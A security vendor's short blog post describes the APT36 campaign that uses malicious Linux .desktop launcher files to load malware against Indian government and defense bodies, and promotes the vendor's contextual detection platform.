Shortcuts as Hidden Weapons
Attackers love abusing shortcuts. Not long ago we wrote about malicious LNK files used against Thai officials and how Contextal was able to proactively stop that threat. Windows users know LNKs well as those seemingly harmless desktop icons that can actually execute hidden commands.
Same Trick - Different OS
Now the same playbook shows up on Linux. The threat actor group APT36 has been distributing malicious .desktop
files in a campaign targeting Indian government and defense entities. Normally just simple launchers, here they're turned into loaders that pull in and execute malware. Different platform, same trick – abuse what looks like something perfectly legitimate.
Why This Matters in India
It's worth noting that Linux is widely adopted across India's public sector, with government-endorsed distributions like BOSS and Maya OS already deployed in ministries, defense, and education. That makes the discussed attack a very real threat vector in this region.
Contextal’s Proactive Defense
To protect against such threats Contextal doesn't just scan extensions or file types in isolation. We analyze the full context - where the file came from, what it contains, what it tries to do, and how it connects to an attack chain. That's how we block threats proactively, before they cause damage.
Deploy Contextal Platform or MailPhence today and stay a step ahead.
See Contextal Platform in action. Book a live demo with our team and experience the most advanced contextual detection system.